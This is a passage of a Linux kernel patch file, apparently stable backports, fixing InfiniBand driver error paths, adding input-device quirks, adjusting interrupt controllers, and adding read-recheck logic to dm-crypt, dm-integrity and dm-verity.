+@@ -1710,7 +1710,7 @@ int bnxt_re_modify_srq(struct ib_srq *ib_srq, struct ib_srq_attr *srq_attr,
+ 	switch (srq_attr_mask) {
+ 	case IB_SRQ_MAX_WR:
+ 		/* SRQ resize is not supported */
+-		break;
++		return -EINVAL;
+ 	case IB_SRQ_LIMIT:
+ 		/* Change the SRQ threshold */
+ 		if (srq_attr->srq_limit > srq->qplib_srq.max_wqe)
+@@ -1725,13 +1725,12 @@ int bnxt_re_modify_srq(struct ib_srq *ib_srq, struct ib_srq_attr *srq_attr,
+ 		/* On success, update the shadow */
+ 		srq->srq_limit = srq_attr->srq_limit;
+ 		/* No need to Build and send response back to udata */
+-		break;
++		return 0;
+ 	default:
+ 		ibdev_err(&rdev->ibdev,
+ 			  "Unsupported srq_attr_mask 0x%x", srq_attr_mask);
+ 		return -EINVAL;
+ 	}
+-	return 0;
+ }
+ 
+ int bnxt_re_query_srq(struct ib_srq *ib_srq, struct ib_srq_attr *srq_attr)
+diff --git a/drivers/infiniband/hw/hfi1/pio.c b/drivers/infiniband/hw/hfi1/pio.c
+index 51ae58c02b15c..802b0e5801a7d 100644
+--- a/drivers/infiniband/hw/hfi1/pio.c
++++ b/drivers/infiniband/hw/hfi1/pio.c
+@@ -2089,7 +2089,7 @@ int init_credit_return(struct hfi1_devdata *dd)
+ 				   "Unable to allocate credit return DMA range for NUMA %d\n",
+ 				   i);
+ 			ret = -ENOMEM;
+-			goto done;
++			goto free_cr_base;
+ 		}
+ 	}
+ 	set_dev_node(&dd->pcidev->dev, dd->node);
+@@ -2097,6 +2097,10 @@ int init_credit_return(struct hfi1_devdata *dd)
+ 	ret = 0;
+ done:
+ 	return ret;
++
++free_cr_base:
++	free_credit_return(dd);
++	goto done;
+ }
+ 
+ void free_credit_return(struct hfi1_devdata *dd)
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index 26c62162759ba..969c5c3ab859e 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -3158,7 +3158,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ {
+ 	int rval = 0;
+ 
+-	if ((unlikely(tx->num_desc + 1 == tx->desc_limit))) {
++	if ((unlikely(tx->num_desc == tx->desc_limit))) {
+ 		rval = _extend_sdma_tx_descs(dd, tx);
+ 		if (rval) {
+ 			__sdma_txclean(dd, tx);
+diff --git a/drivers/infiniband/hw/irdma/defs.h b/drivers/infiniband/hw/irdma/defs.h
+index ad54260cb58c9..ebe98fa2b1cd2 100644
+--- a/drivers/infiniband/hw/irdma/defs.h
++++ b/drivers/infiniband/hw/irdma/defs.h
+@@ -345,6 +345,7 @@ enum irdma_cqp_op_type {
+ #define IRDMA_AE_LLP_TOO_MANY_KEEPALIVE_RETRIES				0x050b
+ #define IRDMA_AE_LLP_DOUBT_REACHABILITY					0x050c
+ #define IRDMA_AE_LLP_CONNECTION_ESTABLISHED				0x050e
++#define IRDMA_AE_LLP_TOO_MANY_RNRS					0x050f
+ #define IRDMA_AE_RESOURCE_EXHAUSTION					0x0520
+ #define IRDMA_AE_RESET_SENT						0x0601
+ #define IRDMA_AE_TERMINATE_SENT						0x0602
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index 311a1138e838d..918a2d783141f 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -379,6 +379,7 @@ static void irdma_process_aeq(struct irdma_pci_f *rf)
+ 		case IRDMA_AE_LLP_TOO_MANY_RETRIES:
+ 		case IRDMA_AE_LCE_QP_CATASTROPHIC:
+ 		case IRDMA_AE_LCE_FUNCTION_CATASTROPHIC:
++		case IRDMA_AE_LLP_TOO_MANY_RNRS:
+ 		case IRDMA_AE_LCE_CQ_CATASTROPHIC:
+ 		case IRDMA_AE_UDA_XMIT_DGRAM_TOO_LONG:
+ 		default:
+@@ -562,6 +563,13 @@ static void irdma_destroy_irq(struct irdma_pci_f *rf,
+ 	dev->irq_ops->irdma_dis_irq(dev, msix_vec->idx);
+ 	irq_update_affinity_hint(msix_vec->irq, NULL);
+ 	free_irq(msix_vec->irq, dev_id);
++	if (rf == dev_id) {
++		tasklet_kill(&rf->dpc_tasklet);
++	} else {
++		struct irdma_ceq *iwceq = (struct irdma_ceq *)dev_id;
++
++		tasklet_kill(&iwceq->dpc_tasklet);
++	}
+ }
+ 
+ /**
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 01faec6ea5285..42c671f209233 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -762,7 +762,9 @@ static int irdma_validate_qp_attrs(struct ib_qp_init_attr *init_attr,
+ 
+ 	if (init_attr->cap.max_inline_data > uk_attrs->max_hw_inline ||
+ 	    init_attr->cap.max_send_sge > uk_attrs->max_hw_wq_frags ||
+-	    init_attr->cap.max_recv_sge > uk_attrs->max_hw_wq_frags)
++	    init_attr->cap.max_recv_sge > uk_attrs->max_hw_wq_frags ||
++	    init_attr->cap.max_send_wr > uk_attrs->max_hw_wq_quanta ||
++	    init_attr->cap.max_recv_wr > uk_attrs->max_hw_rq_quanta)
+ 		return -EINVAL;
+ 
+ 	if (rdma_protocol_roce(&iwdev->ibdev, 1)) {
+@@ -2119,9 +2121,8 @@ static int irdma_create_cq(struct ib_cq *ibcq,
+ 		info.cq_base_pa = iwcq->kmem.pa;
+ 	}
+ 
+-	if (dev->hw_attrs.uk_attrs.hw_rev >= IRDMA_GEN_2)
+-		info.shadow_read_threshold = min(info.cq_uk_init_info.cq_size / 2,
+-						 (u32)IRDMA_MAX_CQ_READ_THRESH);
++	info.shadow_read_threshold = min(info.cq_uk_init_info.cq_size / 2,
++					 (u32)IRDMA_MAX_CQ_READ_THRESH);
+ 
+ 	if (irdma_sc_cq_init(cq, &info)) {
+ 		ibdev_dbg(&iwdev->ibdev, "VERBS: init cq fail\n");
+diff --git a/drivers/infiniband/hw/qedr/verbs.c b/drivers/infiniband/hw/qedr/verbs.c
+index d745ce9dc88aa..61755b5f3e20d 100644
+--- a/drivers/infiniband/hw/qedr/verbs.c
++++ b/drivers/infiniband/hw/qedr/verbs.c
+@@ -1879,8 +1879,17 @@ static int qedr_create_user_qp(struct qedr_dev *dev,
+ 		/* RQ - read access only (0) */
+ 		rc = qedr_init_user_queue(udata, dev, &qp->urq, ureq.rq_addr,
+ 					  ureq.rq_len, true, 0, alloc_and_init);
+-		if (rc)
++		if (rc) {
++			ib_umem_release(qp->usq.umem);
++			qp->usq.umem = NULL;
++			if (rdma_protocol_roce(&dev->ibdev, 1)) {
++				qedr_free_pbl(dev, &qp->usq.pbl_info,
++					      qp->usq.pbl_tbl);
++			} else {
++				kfree(qp->usq.pbl_tbl);
++			}
+ 			return rc;
++		}
+ 	}
+ 
+ 	memset(&in_params, 0, sizeof(in_params));
+diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
+index 25e799dba999e..cffa93f114a73 100644
+--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
++++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
+@@ -79,12 +79,16 @@ module_param(srpt_srq_size, int, 0444);
+ MODULE_PARM_DESC(srpt_srq_size,
+ 		 "Shared receive queue (SRQ) size.");
+ 
++static int srpt_set_u64_x(const char *buffer, const struct kernel_param *kp)
++{
++	return kstrtou64(buffer, 16, (u64 *)kp->arg);
++}
+ static int srpt_get_u64_x(char *buffer, const struct kernel_param *kp)
+ {
+ 	return sprintf(buffer, "0x%016llx\n", *(u64 *)kp->arg);
+ }
+-module_param_call(srpt_service_guid, NULL, srpt_get_u64_x, &srpt_service_guid,
+-		  0444);
++module_param_call(srpt_service_guid, srpt_set_u64_x, srpt_get_u64_x,
++		  &srpt_service_guid, 0444);
+ MODULE_PARM_DESC(srpt_service_guid,
+ 		 "Using this value for ioc_guid, id_ext, and cm_listen_id instead of using the node_guid of the first HCA.");
+ 
+@@ -210,10 +214,12 @@ static const char *get_ch_state_name(enum rdma_ch_state s)
+ /**
+  * srpt_qp_event - QP event callback function
+  * @event: Description of the event that occurred.
+- * @ch: SRPT RDMA channel.
++ * @ptr: SRPT RDMA channel.
+  */
+-static void srpt_qp_event(struct ib_event *event, struct srpt_rdma_ch *ch)
++static void srpt_qp_event(struct ib_event *event, void *ptr)
+ {
++	struct srpt_rdma_ch *ch = ptr;
++
+ 	pr_debug("QP event %d on ch=%p sess_name=%s-%d state=%s\n",
+ 		 event->event, ch, ch->sess_name, ch->qp->qp_num,
+ 		 get_ch_state_name(ch->state));
+@@ -1807,8 +1813,7 @@ static int srpt_create_ch_ib(struct srpt_rdma_ch *ch)
+ 	ch->cq_size = ch->rq_size + sq_size;
+ 
+ 	qp_init->qp_context = (void *)ch;
+-	qp_init->event_handler
+-		= (void(*)(struct ib_event *, void*))srpt_qp_event;
++	qp_init->event_handler = srpt_qp_event;
+ 	qp_init->send_cq = ch->cq;
+ 	qp_init->recv_cq = ch->cq;
+ 	qp_init->sq_sig_type = IB_SIGNAL_REQ_WR;
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index e8011d70d0799..02f3bc4e4895e 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -294,6 +294,7 @@ static const struct xpad_device {
+ 	{ 0x1689, 0xfd00, "Razer Onza Tournament Edition", 0, XTYPE_XBOX360 },
+ 	{ 0x1689, 0xfd01, "Razer Onza Classic Edition", 0, XTYPE_XBOX360 },
+ 	{ 0x1689, 0xfe00, "Razer Sabertooth", 0, XTYPE_XBOX360 },
++	{ 0x17ef, 0x6182, "Lenovo Legion Controller for Windows", 0, XTYPE_XBOX360 },
+ 	{ 0x1949, 0x041a, "Amazon Game Controller", 0, XTYPE_XBOX360 },
+ 	{ 0x1bad, 0x0002, "Harmonix Rock Band Guitar", 0, XTYPE_XBOX360 },
+ 	{ 0x1bad, 0x0003, "Harmonix Rock Band Drumkit", MAP_DPAD_TO_BUTTONS, XTYPE_XBOX360 },
+@@ -489,6 +490,7 @@ static const struct usb_device_id xpad_table[] = {
+ 	XPAD_XBOX360_VENDOR(0x15e4),		/* Numark X-Box 360 controllers */
+ 	XPAD_XBOX360_VENDOR(0x162e),		/* Joytech X-Box 360 controllers */
+ 	XPAD_XBOX360_VENDOR(0x1689),		/* Razer Onza */
++	XPAD_XBOX360_VENDOR(0x17ef),		/* Lenovo */
+ 	XPAD_XBOX360_VENDOR(0x1949),		/* Amazon controllers */
+ 	XPAD_XBOX360_VENDOR(0x1bad),		/* Harminix Rock Band Guitar and Drums */
+ 	XPAD_XBOX360_VENDOR(0x20d6),		/* PowerA Controllers */
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index cd45a65e17f2c..dfc6c581873b7 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -634,6 +634,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
+ 	},
++	{
++		/* Fujitsu Lifebook U728 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LIFEBOOK U728"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOAUX)
++	},
+ 	{
+ 		/* Gigabyte M912 */
+ 		.matches = {
+diff --git a/drivers/input/touchscreen/goodix.c b/drivers/input/touchscreen/goodix.c
+index 3f0732db7bf5b..6de64b3f900fb 100644
+--- a/drivers/input/touchscreen/goodix.c
++++ b/drivers/input/touchscreen/goodix.c
+@@ -884,7 +884,8 @@ static int goodix_add_acpi_gpio_mappings(struct goodix_ts_data *ts)
+ 		}
+ 	}
+ 
+-	if (ts->gpio_count == 2 && ts->gpio_int_idx == 0) {
++	/* Some devices with gpio_int_idx 0 list a third unused GPIO */
++	if ((ts->gpio_count == 2 || ts->gpio_count == 3) && ts->gpio_int_idx == 0) {
+ 		ts->irq_pin_access_method = IRQ_PIN_ACCESS_ACPI_GPIO;
+ 		gpio_mapping = acpi_goodix_int_first_gpios;
+ 	} else if (ts->gpio_count == 2 && ts->gpio_int_idx == 1) {
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index b83b39e93e1a9..4d03fb3a82460 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -3161,6 +3161,7 @@ static void its_cpu_init_lpis(void)
+ 	val |= GICR_CTLR_ENABLE_LPIS;
+ 	writel_relaxed(val, rbase + GICR_CTLR);
+ 
++out:
+ 	if (gic_rdists->has_vlpis && !gic_rdists->has_rvpeid) {
+ 		void __iomem *vlpi_base = gic_data_rdist_vlpi_base();
+ 
+@@ -3196,7 +3197,6 @@ static void its_cpu_init_lpis(void)
+ 
+ 	/* Make sure the GIC has seen the above */
+ 	dsb(sy);
+-out:
+ 	gic_data_rdist()->flags |= RD_LOCAL_LPI_ENABLED;
+ 	pr_info("GICv3: CPU%d: using %s LPI pending table @%pa\n",
+ 		smp_processor_id(),
+diff --git a/drivers/irqchip/irq-sifive-plic.c b/drivers/irqchip/irq-sifive-plic.c
+index 2f4784860df5d..be5e19a86ac3b 100644
+--- a/drivers/irqchip/irq-sifive-plic.c
++++ b/drivers/irqchip/irq-sifive-plic.c
+@@ -144,7 +144,13 @@ static void plic_irq_eoi(struct irq_data *d)
+ {
+ 	struct plic_handler *handler = this_cpu_ptr(&plic_handlers);
+ 
+-	writel(d->hwirq, handler->hart_base + CONTEXT_CLAIM);
++	if (unlikely(irqd_irq_disabled(d))) {
++		plic_toggle(handler, d->hwirq, 1);
++		writel(d->hwirq, handler->hart_base + CONTEXT_CLAIM);
++		plic_toggle(handler, d->hwirq, 0);
++	} else {
++		writel(d->hwirq, handler->hart_base + CONTEXT_CLAIM);
++	}
+ }
+ 
+ #ifdef CONFIG_SMP
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index 0e6068ee783e7..3e215aa85b99a 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -61,6 +61,8 @@ struct convert_context {
+ 		struct skcipher_request *req;
+ 		struct aead_request *req_aead;
+ 	} r;
++	bool aead_recheck;
++	bool aead_failed;
+ 
+ };
+ 
+@@ -81,6 +83,8 @@ struct dm_crypt_io {
+ 	blk_status_t error;
+ 	sector_t sector;
+ 
++	struct bvec_iter saved_bi_iter;
++
+ 	struct rb_node rb_node;
+ } CRYPTO_MINALIGN_ATTR;
+ 
+@@ -1365,10 +1369,13 @@ static int crypt_convert_block_aead(struct crypt_config *cc,
+ 	if (r == -EBADMSG) {
+ 		sector_t s = le64_to_cpu(*sector);
+ 
+-		DMERR_LIMIT("%pg: INTEGRITY AEAD ERROR, sector %llu",
+-			    ctx->bio_in->bi_bdev, s);
+-		dm_audit_log_bio(DM_MSG_PREFIX, "integrity-aead",
+-				 ctx->bio_in, s, 0);
++		ctx->aead_failed = true;
++		if (ctx->aead_recheck) {
++			DMERR_LIMIT("%pg: INTEGRITY AEAD ERROR, sector %llu",
++				    ctx->bio_in->bi_bdev, s);
++			dm_audit_log_bio(DM_MSG_PREFIX, "integrity-aead",
++					 ctx->bio_in, s, 0);
++		}
+ 	}
+ 
+ 	if (!r && cc->iv_gen_ops && cc->iv_gen_ops->post)
+@@ -1724,6 +1731,8 @@ static void crypt_io_init(struct dm_crypt_io *io, struct crypt_config *cc,
+ 	io->base_bio = bio;
+ 	io->sector = sector;
+ 	io->error = 0;
++	io->ctx.aead_recheck = false;
++	io->ctx.aead_failed = false;
+ 	io->ctx.r.req = NULL;
+ 	io->integrity_metadata = NULL;
+ 	io->integrity_metadata_from_pool = false;
+@@ -1735,6 +1744,8 @@ static void crypt_inc_pending(struct dm_crypt_io *io)
+ 	atomic_inc(&io->io_pending);
+ }
+ 
++static void kcryptd_queue_read(struct dm_crypt_io *io);
++
+ /*
+  * One of the bios was finished. Check for completion of
+  * the whole request and correctly clean up the buffer.
+@@ -1748,6 +1759,15 @@ static void crypt_dec_pending(struct dm_crypt_io *io)
+ 	if (!atomic_dec_and_test(&io->io_pending))
+ 		return;
+ 
++	if (likely(!io->ctx.aead_recheck) && unlikely(io->ctx.aead_failed) &&
++	    cc->on_disk_tag_size && bio_data_dir(base_bio) == READ) {
++		io->ctx.aead_recheck = true;
++		io->ctx.aead_failed = false;
++		io->error = 0;
++		kcryptd_queue_read(io);
++		return;
++	}
++
+ 	if (io->ctx.r.req)
+ 		crypt_free_req(cc, io->ctx.r.req, base_bio);
+ 
+@@ -1783,15 +1803,19 @@ static void crypt_endio(struct bio *clone)
+ 	struct dm_crypt_io *io = clone->bi_private;
+ 	struct crypt_config *cc = io->cc;
+ 	unsigned int rw = bio_data_dir(clone);
+-	blk_status_t error;
++	blk_status_t error = clone->bi_status;
++
++	if (io->ctx.aead_recheck && !error) {
++		kcryptd_queue_crypt(io);
++		return;
++	}
+ 
+ 	/*
+ 	 * free the processed pages
+ 	 */
+-	if (rw == WRITE)
++	if (rw == WRITE || io->ctx.aead_recheck)
+ 		crypt_free_buffer_pages(cc, clone);
+ 
+-	error = clone->bi_status;
+ 	bio_put(clone);
+ 
+ 	if (rw == READ && !error) {
+@@ -1812,6 +1836,22 @@ static int kcryptd_io_read(struct dm_crypt_io *io, gfp_t gfp)
+ 	struct crypt_config *cc = io->cc;
+ 	struct bio *clone;
+ 
++	if (io->ctx.aead_recheck) {
++		if (!(gfp & __GFP_DIRECT_RECLAIM))
++			return 1;
++		crypt_inc_pending(io);
++		clone = crypt_alloc_buffer(io, io->base_bio->bi_iter.bi_size);
++		if (unlikely(!clone)) {
++			crypt_dec_pending(io);
++			return 1;
++		}
++		clone->bi_iter.bi_sector = cc->start + io->sector;
++		crypt_convert_init(cc, &io->ctx, clone, clone, io->sector);
++		io->saved_bi_iter = clone->bi_iter;
++		dm_submit_bio_remap(io->base_bio, clone);
++		return 0;
++	}
++
+ 	/*
+ 	 * We need the original biovec array in order to decrypt the whole bio
+ 	 * data *afterwards* -- thanks to immutable biovecs we don't need to
+@@ -2038,6 +2078,12 @@ static void kcryptd_crypt_write_convert(struct dm_crypt_io *io)
+ 	io->ctx.bio_out = clone;
+ 	io->ctx.iter_out = clone->bi_iter;
+ 
++	if (crypt_integrity_aead(cc)) {
++		bio_copy_data(clone, io->base_bio);
++		io->ctx.bio_in = clone;
++		io->ctx.iter_in = clone->bi_iter;
++	}
++
+ 	sector += bio_sectors(clone);
+ 
+ 	crypt_inc_pending(io);
+@@ -2074,6 +2120,14 @@ static void kcryptd_crypt_write_convert(struct dm_crypt_io *io)
+ 
+ static void kcryptd_crypt_read_done(struct dm_crypt_io *io)
+ {
++	if (io->ctx.aead_recheck) {
++		if (!io->error) {
++			io->ctx.bio_in->bi_iter = io->saved_bi_iter;
++			bio_copy_data(io->base_bio, io->ctx.bio_in);
++		}
++		crypt_free_buffer_pages(io->cc, io->ctx.bio_in);
++		bio_put(io->ctx.bio_in);
++	}
+ 	crypt_dec_pending(io);
+ }
+ 
+@@ -2103,11 +2157,17 @@ static void kcryptd_crypt_read_convert(struct dm_crypt_io *io)
+ 
+ 	crypt_inc_pending(io);
+ 
+-	crypt_convert_init(cc, &io->ctx, io->base_bio, io->base_bio,
+-			   io->sector);
++	if (io->ctx.aead_recheck) {
++		io->ctx.cc_sector = io->sector + cc->iv_offset;
++		r = crypt_convert(cc, &io->ctx,
++				  test_bit(DM_CRYPT_NO_READ_WORKQUEUE, &cc->flags), true);
++	} else {
++		crypt_convert_init(cc, &io->ctx, io->base_bio, io->base_bio,
++				   io->sector);
+ 
+-	r = crypt_convert(cc, &io->ctx,
+-			  test_bit(DM_CRYPT_NO_READ_WORKQUEUE, &cc->flags), true);
++		r = crypt_convert(cc, &io->ctx,
++				  test_bit(DM_CRYPT_NO_READ_WORKQUEUE, &cc->flags), true);
++	}
+ 	/*
+ 	 * Crypto API backlogged the request, because its queue was full
+ 	 * and we're in softirq context, so continue from a workqueue
+@@ -2150,10 +2210,13 @@ static void kcryptd_async_done(struct crypto_async_request *async_req,
+ 	if (error == -EBADMSG) {
+ 		sector_t s = le64_to_cpu(*org_sector_of_dmreq(cc, dmreq));
+ 
+-		DMERR_LIMIT("%pg: INTEGRITY AEAD ERROR, sector %llu",
+-			    ctx->bio_in->bi_bdev, s);
+-		dm_audit_log_bio(DM_MSG_PREFIX, "integrity-aead",
+-				 ctx->bio_in, s, 0);
++		ctx->aead_failed = true;
++		if (ctx->aead_recheck) {
++			DMERR_LIMIT("%pg: INTEGRITY AEAD ERROR, sector %llu",
++				    ctx->bio_in->bi_bdev, s);
++			dm_audit_log_bio(DM_MSG_PREFIX, "integrity-aead",
++					 ctx->bio_in, s, 0);
++		}
+ 		io->error = BLK_STS_PROTECTION;
+ 	} else if (error < 0)
+ 		io->error = BLK_STS_IOERR;
+@@ -3079,7 +3142,7 @@ static int crypt_ctr_optional(struct dm_target *ti, unsigned int argc, char **ar
+ 			sval = strchr(opt_string + strlen("integrity:"), ':') + 1;
+ 			if (!strcasecmp(sval, "aead")) {
+ 				set_bit(CRYPT_MODE_INTEGRITY_AEAD, &cc->cipher_flags);
+-			} else  if (strcasecmp(sval, "none")) {
++			} else if (strcasecmp(sval, "none")) {
+ 				ti->error = "Unknown integrity profile";
+ 				return -EINVAL;
+ 			}
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 77fcff82c82ac..3da4359f51645 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -279,6 +279,8 @@ struct dm_integrity_c {
+ 
+ 	atomic64_t number_of_mismatches;
+ 
++	mempool_t recheck_pool;
++
+ 	struct notifier_block reboot_notifier;
+ };
+ 
+@@ -1699,6 +1701,77 @@ static void integrity_sector_checksum(struct dm_integrity_c *ic, sector_t sector
+ 	get_random_bytes(result, ic->tag_size);
+ }
+ 
++static noinline void integrity_recheck(struct dm_integrity_io *dio, char *checksum)
++{
++	struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
++	struct dm_integrity_c *ic = dio->ic;
++	struct bvec_iter iter;
++	struct bio_vec bv;
++	sector_t sector, logical_sector, area, offset;
++	struct page *page;
++	void *buffer;
++
++	get_area_and_offset(ic, dio->range.logical_sector, &area, &offset);
++	dio->metadata_block = get_metadata_sector_and_offset(ic, area, offset,
++							     &dio->metadata_offset);
++	sector = get_data_sector(ic, area, offset);
++	logical_sector = dio->range.logical_sector;
++
++	page = mempool_alloc(&ic->recheck_pool, GFP_NOIO);
++	buffer = page_to_virt(page);
++
++	__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
++		unsigned pos = 0;
++
++		do {
++			char *mem;
++			int r;
++			struct dm_io_request io_req;
++			struct dm_io_region io_loc;
++			io_req.bi_opf = REQ_OP_READ;
++			io_req.mem.type = DM_IO_KMEM;
++			io_req.mem.ptr.addr = buffer;
++			io_req.notify.fn = NULL;
++			io_req.client = ic->io;
++			io_loc.bdev = ic->dev->bdev;
++			io_loc.sector = sector;
++			io_loc.count = ic->sectors_per_block;
++
++			r = dm_io(&io_req, 1, &io_loc, NULL);
++			if (unlikely(r)) {
++				dio->bi_status = errno_to_blk_status(r);
++				goto free_ret;
++			}
++
++			integrity_sector_checksum(ic, logical_sector, buffer, checksum);
++			r = dm_integrity_rw_tag(ic, checksum, &dio->metadata_block,
++						&dio->metadata_offset, ic->tag_size, TAG_CMP);
++			if (r) {
++				if (r > 0) {
++					DMERR_LIMIT("%pg: Checksum failed at sector 0x%llx",
++						    bio->bi_bdev, logical_sector);
++					atomic64_inc(&ic->number_of_mismatches);
++					dm_audit_log_bio(DM_MSG_PREFIX, "integrity-checksum",
++							 bio, logical_sector, 0);
++					r = -EILSEQ;
++				}
++				dio->bi_status = errno_to_blk_status(r);
++				goto free_ret;
++			}
++
++			mem = bvec_kmap_local(&bv);
++			memcpy(mem + pos, buffer, ic->sectors_per_block << SECTOR_SHIFT);
++			kunmap_local(mem);
++
++			pos += ic->sectors_per_block << SECTOR_SHIFT;
++			sector += ic->sectors_per_block;
++			logical_sector += ic->sectors_per_block;
++		} while (pos < bv.bv_len);
++	}
++free_ret:
++	mempool_free(page, &ic->recheck_pool);
++}
++
+ static void integrity_metadata(struct work_struct *w)
+ {
+ 	struct dm_integrity_io *dio = container_of(w, struct dm_integrity_io, work);
+@@ -1784,15 +1857,8 @@ static void integrity_metadata(struct work_struct *w)
+ 						checksums_ptr - checksums, dio->op == REQ_OP_READ ? TAG_CMP : TAG_WRITE);
+ 			if (unlikely(r)) {
+ 				if (r > 0) {
+-					sector_t s;
+-
+-					s = sector - ((r + ic->tag_size - 1) / ic->tag_size);
+-					DMERR_LIMIT("%pg: Checksum failed at sector 0x%llx",
+-						    bio->bi_bdev, s);
+-					r = -EILSEQ;
+-					atomic64_inc(&ic->number_of_mismatches);
+-					dm_audit_log_bio(DM_MSG_PREFIX, "integrity-checksum",
+-							 bio, s, 0);
++					integrity_recheck(dio, checksums);
++					goto skip_io;
+ 				}
+ 				if (likely(checksums != checksums_onstack))
+ 					kfree(checksums);
+@@ -4208,6 +4274,12 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv
+ 		goto bad;
+ 	}
+ 
++	r = mempool_init_page_pool(&ic->recheck_pool, 1, 0);
++	if (r) {
++		ti->error = "Cannot allocate mempool";
++		goto bad;
++	}
++
+ 	ic->metadata_wq = alloc_workqueue("dm-integrity-metadata",
+ 					  WQ_MEM_RECLAIM, METADATA_WORKQUEUE_MAX_ACTIVE);
+ 	if (!ic->metadata_wq) {
+@@ -4572,6 +4644,7 @@ static void dm_integrity_dtr(struct dm_target *ti)
+ 	kvfree(ic->bbs);
+ 	if (ic->bufio)
+ 		dm_bufio_client_destroy(ic->bufio);
++	mempool_exit(&ic->recheck_pool);
+ 	mempool_exit(&ic->journal_io_mempool);
+ 	if (ic->io)
+ 		dm_io_client_destroy(ic->io);
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 4669923f4cfb4..b48e1b59e6da4 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -474,6 +474,63 @@ int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 	return 0;
+ }
+ 
++static int verity_recheck_copy(struct dm_verity *v, struct dm_verity_io *io,
++			       u8 *data, size_t len)
++{
++	memcpy(data, io->recheck_buffer, len);
++	io->recheck_buffer += len;
++
++	return 0;
++}
++
++static noinline int verity_recheck(struct dm_verity *v, struct dm_verity_io *io,
++				   struct bvec_iter start, sector_t cur_block)
++{
++	struct page *page;
++	void *buffer;
++	int r;
++	struct dm_io_request io_req;
++	struct dm_io_region io_loc;
++
++	page = mempool_alloc(&v->recheck_pool, GFP_NOIO);
++	buffer = page_to_virt(page);
++
++	io_req.bi_opf = REQ_OP_READ;
++	io_req.mem.type = DM_IO_KMEM;
++	io_req.mem.ptr.addr = buffer;
++	io_req.notify.fn = NULL;
++	io_req.client = v->io;
++	io_loc.bdev = v->data_dev->bdev;
++	io_loc.sector = cur_block << (v->data_dev_block_bits - SECTOR_SHIFT);
++	io_loc.count = 1 << (v->data_dev_block_bits - SECTOR_SHIFT);
++	r = dm_io(&io_req, 1, &io_loc, NULL);
++	if (unlikely(r))
++		goto free_ret;
++
++	r = verity_hash(v, verity_io_hash_req(v, io), buffer,
++			1 << v->data_dev_block_bits,
++			verity_io_real_digest(v, io), true);
++	if (unlikely(r))
++		goto free_ret;
++
++	if (memcmp(verity_io_real_digest(v, io),
++		   verity_io_want_digest(v, io), v->digest_size)) {
++		r = -EIO;
++		goto free_ret;
++	}
++
++	io->recheck_buffer = buffer;
++	r = verity_for_bv_block(v, io, &start, verity_recheck_copy);
++	if (unlikely(r))
++		goto free_ret;
++
++	r = 0;
++free_ret:
++	mempool_free(page, &v->recheck_pool);
++
++	return r;
++}
++
+ static int verity_bv_zero(struct dm_verity *v, struct dm_verity_io *io,
+ 			  u8 *data, size_t len)
+ {
+@@ -500,9 +557,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ {
+ 	bool is_zero;
+ 	struct dm_verity *v = io->v;
+-#if defined(CONFIG_DM_VERITY_FEC)
+ 	struct bvec_iter start;
+-#endif
+ 	struct bvec_iter iter_copy;
+ 	struct bvec_iter *iter;
+ 	struct crypto_wait wait;
+@@ -553,10 +608,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 		if (unlikely(r < 0))
+ 			return r;
+ 
+-#if defined(CONFIG_DM_VERITY_FEC)
+-		if (verity_fec_is_enabled(v))
+-			start = *iter;
+-#endif
++		start = *iter;
+ 		r = verity_for_io_block(v, io, iter, &wait);
+ 		if (unlikely(r < 0))
+ 			return r;
+@@ -578,6 +630,10 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 			 * tasklet since it may sleep, so fallback to work-queue.
+ 			 */
+ 			return -EAGAIN;
++		} else if (verity_recheck(v, io, start, cur_block) == 0) {
++			if (v->validated_blocks)
++				set_bit(cur_block, v->validated_blocks);
++			continue;
+ #if defined(CONFIG_DM_VERITY_FEC)
+ 		} else if (verity_fec_decode(v, io, DM_VERITY_BLOCK_TYPE_DATA,
